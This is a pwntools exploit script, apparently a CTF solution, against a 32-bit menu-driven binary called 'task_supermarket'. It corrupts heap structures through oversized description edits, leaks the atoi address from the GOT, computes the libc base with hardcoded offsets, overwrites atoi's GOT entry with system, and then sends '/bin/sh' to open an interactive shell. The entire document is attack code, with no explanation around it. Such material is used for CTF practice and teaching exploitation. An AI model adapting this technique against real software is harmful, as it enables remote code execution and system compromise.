1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
| from pwn import *
p = remote('ip',port)
elf = ELF('./task_supermarket')
def add(name,price,descrip_size,des):
p.recvuntil('choice>> ')
p.sendline('1')
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('price:')
p.sendline(str(price))
p.recvuntil('descrip_size:')
p.sendline(str(descrip_size))
p.recvuntil('description:')
p.sendline(des)
def delete(name):
p.recvuntil('choice>> ')
p.sendline('2')
p.recvuntil('name:')
p.sendline(name)
def list():
p.recvuntil('choice>> ')
p.sendline('3')
def change_price(name,size_offset):
p.recvuntil('choice>> ')
p.sendline('4')
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('rise in:')
p.sendline(size_offset)
def change_des(name,descrip_size,des):
p.recvuntil('choice>> ')
p.sendline('5')
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('descrip_size:')
p.sendline(str(descrip_size))
p.recvuntil('description:')
p.sendline(des)
add('aaa',1,0x28,'aa')
change_des('aaa',0x8,'aa')
add('bbb',1,0x28,'bb')
change_des('bbb',0x8,'bb')
add('ccc',1,0x28,'cc')
change_des('ccc',0x8,'cc')
add('ddd',1,0x28,'dd')
change_des('ddd',0x8,'dd')
payload = 'a'*0x4 + p32(0)*2 + p32(0x21) + 'bbb\x00' + p32(0)*3 + p32(1) + p32(0x48)
change_des('aaa',0x28,payload)
payload1 = 'b'*0x4 + p32(0)*2 + p32(0x21) + 'ccc\x00' + p32(0)*3 + p32(1) + p32(0x48) + p32(elf.got['atoi']) + p32(0x14)
change_des('bbb',0x48,payload1)
list()
p.recvuntil('ccc: price.1, des.')
atoi_addr = u32(p.recv(4))
log.success('atoi addr: 0x%x'% atoi_addr)
offset_atoi = 0x02d050
offset_system = 0x03a940
libc_base = atoi_addr - offset_atoi
system_addr = libc_base + offset_system
change_des('ccc',0x48,p32(system_addr))
raw_input("go: ")
p.sendline('/bin/sh')
p.interactive()
|